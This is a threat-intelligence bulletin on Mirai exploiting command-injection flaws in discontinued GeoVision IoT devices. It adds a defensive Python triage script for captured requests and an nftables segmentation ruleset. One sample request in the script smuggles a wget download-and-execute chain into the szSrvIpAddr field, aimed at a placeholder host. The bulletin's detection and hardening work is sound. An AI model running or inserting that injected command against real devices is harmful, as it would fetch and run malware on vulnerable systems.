Here Comes Mirai: IoT Devices RSVP to Active Exploitation
Summary:
In April 2025, the Akamai Security Intelligence and Response Team (SIRT) identified active exploitation of two critical command injection vulnerabilities, CVE-2024-6047 and CVE-2024-11120, in discontinued GeoVision IoT devices. The flaws were disclosed in June and November 2024, respectively, but this is the first confirmed in-the-wild exploitation. Both live in the /DateSetting.cgi endpoint: the szSrvIpAddr parameter reaches the system shell without sanitization, so an unauthenticated remote attacker can append arbitrary commands to it. Akamai observed the activity on its global honeypot network; the injected commands downloaded and executed an ARM build of a Mirai variant named "boatnet," associated with the LZRD strain. On execution the malware prints a distinctive string to the console and enables numerous Mirai attack functions, including attack_tcp_ack, attack_udp_plain, and attack_method_ovhdrop, which are used to conduct large-scale DDoS attacks.
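The following is an added example, not code from the Akamai report or from GeoVision. It shows how a practitioner would triage captured HTTP requests for the injection pattern described above: only the endpoint (/DateSetting.cgi) and parameter (szSrvIpAddr) come from the report; the sample requests, the TEST-NET addresses, the download URL and the file name are constructed for the example and are not the real campaign payload or IoCs. The is_plain_ipv4 check is the allow-list validation the device should have applied before the value reached a shell.

```python
"""
Added example (not code from the Akamai report): triage captured HTTP requests for
the GeoVision command-injection pattern. The endpoint and parameter names come from
the report; the sample requests, addresses and file names below are constructed and
are not the real campaign payload or IoCs.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/DateSetting.cgi"
PARAM = "szSrvIpAddr"
# Characters that let a shell chain, substitute or redirect commands; none belongs
# in a field that is supposed to hold an IP address.
SHELL_METACHARS = set(";|&`$(){}<>\n")
# Download URLs embedded in an injected command (typical wget/tftp stager shape).
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\"<>;|&`]+")


def is_plain_ipv4(value: str) -> bool:
    """Allow-list validation the device should have applied: accept exactly one
    dotted-quad IPv4 address and nothing else."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, params), merging the query
    string with a form-encoded body so GET and POST variants are treated alike."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _version = head.split("\r\n", 1)[0].split(" ", 2)
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return method, url.path, params


def triage_request(raw: str):
    """Return None for requests that do not touch the endpoint, otherwise a verdict:
    'benign' (valid IPv4), 'malformed' (not an IP, no shell syntax) or 'injection'."""
    method, path, params = parse_request(raw)
    if path != ENDPOINT or PARAM not in params:
        return None
    findings = []
    for value in params[PARAM]:
        if is_plain_ipv4(value):
            continue
        findings.append({
            "value": value,
            "metachars": sorted(set(value) & SHELL_METACHARS),
            "urls": URL_RE.findall(value),
        })
    if not findings:
        verdict = "benign"
    elif any(f["metachars"] for f in findings):
        verdict = "injection"
    else:
        verdict = "malformed"
    return {"method": method, "path": path, "verdict": verdict, "findings": findings}


def triage_capture(raws):
    """Run triage over a capture and keep only requests that hit the endpoint."""
    return [r for r in (triage_request(raw) for raw in raws) if r is not None]


# Constructed sample capture: raw HTTP/1.1 requests as a honeypot or reverse proxy
# would record them. TEST-NET addresses; not real traffic.
SAMPLE_REQUESTS = [
    # 1. Legitimate time-server update.
    "POST /DateSetting.cgi HTTP/1.1\r\nHost: 192.0.2.50\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "szSrvIpAddr=192.0.2.10",
    # 2. Injection: a shell separator followed by a fetch-and-run chain
    #    (constructed shape, hypothetical URL and file name, not the real payload).
    "POST /DateSetting.cgi HTTP/1.1\r\nHost: 192.0.2.50\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "szSrvIpAddr=192.0.2.10%3Bwget+http%3A%2F%2F198.51.100.7%2Fx.arm+-O+%2Ftmp%2Fx"
    "%3Bchmod+%2Bx+%2Ftmp%2Fx%3B%2Ftmp%2Fx",
    # 3. Not an IP at all: worth a look, but carries no shell syntax.
    "GET /DateSetting.cgi?szSrvIpAddr=pool.example.net HTTP/1.1\r\n"
    "Host: 192.0.2.50\r\n\r\n",
    # 4. Unrelated request, ignored by the triage.
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.50\r\n\r\n",
]

if __name__ == "__main__":
    for hit in triage_capture(SAMPLE_REQUESTS):
        print(hit["verdict"], hit["method"], hit["path"])
        for f in hit["findings"]:
            print("   value:", f["value"])
            print("   metachars:", f["metachars"], "urls:", f["urls"])
```

The extracted URLs are the useful output for a responder: they point at the payload host to block and at the sample to pull for analysis. On the device side, the allow-list check alone is a stopgap; the durable fix for this class of bug is to never build a shell command string from request parameters at all and to pass the validated address to the program as a separate argument.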
Security Officer Comments:
Further analysis revealed a hard-coded command-and-control IP address embedded in the malware and banner messages returned on some C2 ports that closely resemble those of InfectedSlurs, a botnet Akamai first reported in 2023. Although the original InfectedSlurs infrastructure appears to be inactive, the matching banner strings suggest that remnants of that campaign are still operational or that its code has been recycled. Beyond the GeoVision flaws, the same botnet has been seen exploiting other known vulnerabilities, including a Hadoop YARN weakness, CVE-2018-10561 (Dasan GPON routers), a ZTE ZXV10 H108L router flaw, and a DigiEver vulnerability that Akamai reported previously.
The attackers used the same command injection tactics against these devices and retrieved the malware payloads from the same infrastructure. Akamai published indicators of compromise, including payload URLs, C2 IPs, and malicious file names, to help organizations identify and remediate infections.
Suggested Corrections:
IOCs:
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
Users should be wary of IoT devices that lack basic security controls. Many have no multi-factor authentication, and some do not even allow the default username and password to be changed. Cybercriminals will continue to target the ever-growing IoT device market. The affected GeoVision models are discontinued, so no fix should be expected; they should be retired or, failing that, isolated and kept unreachable from the internet.
If IoT devices must be used, segment them from sensitive networks and restrict their outbound access to the services they actually need.
Once a device has been conscripted into a botnet, users may notice slow or sluggish devices and unusual network traffic, such as bursts of outbound traffic toward a single destination or connections to unknown hosts.
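The following is an added example of the segmentation recommended above, written as an nftables ruleset; it is not configuration from the Akamai report or from any vendor. The interface names (lan0, iot0, wan0), the 192.0.2.0/24 range and the local DNS/NTP server at 192.0.2.1 are assumptions. The point of the ruleset is that a camera which has been exploited still cannot fetch a payload, reach a C2 server, or flood an outside target, because the only destination it is allowed to talk to is the internal resolver and time server; that is also the only host its date-setting page has any legitimate reason to contact.

```nft
# Added example (not from the Akamai report). Forward policy for a router that
# fronts a user LAN ("lan0"), an IoT VLAN ("iot0") and the uplink ("wan0").
# Interface names and addresses are assumptions for this example.
#
# Weak setting this replaces: a flat network, or a forward chain with
# "policy accept", where a camera can reach every LAN host and any internet host.

table inet iot_segmentation {
    chain forward {
        type filter hook forward priority 0; policy drop;

        # Replies to connections the rules below permitted
        ct state established,related accept

        # User LAN keeps normal internet access
        iifname "lan0" oifname "wan0" accept

        # Management hosts on the LAN may reach the camera web UI, nothing else
        iifname "lan0" oifname "iot0" ip daddr 192.0.2.0/24 tcp dport { 80, 443 } accept

        # The IoT VLAN may only talk to the local resolver and NTP server
        iifname "iot0" ip daddr 192.0.2.1 udp dport { 53, 123 } accept

        # Everything else from the IoT VLAN (lateral movement into the LAN, payload
        # downloads, C2 check-ins, outbound flood traffic) is logged, counted, dropped
        iifname "iot0" log prefix "iot-drop " counter drop
    }
}
```

Load it with nft -f and watch the counter and the "iot-drop" log lines: a camera that suddenly produces a stream of dropped packets toward one external address is showing exactly the post-compromise traffic pattern described above.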
Link(s):
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet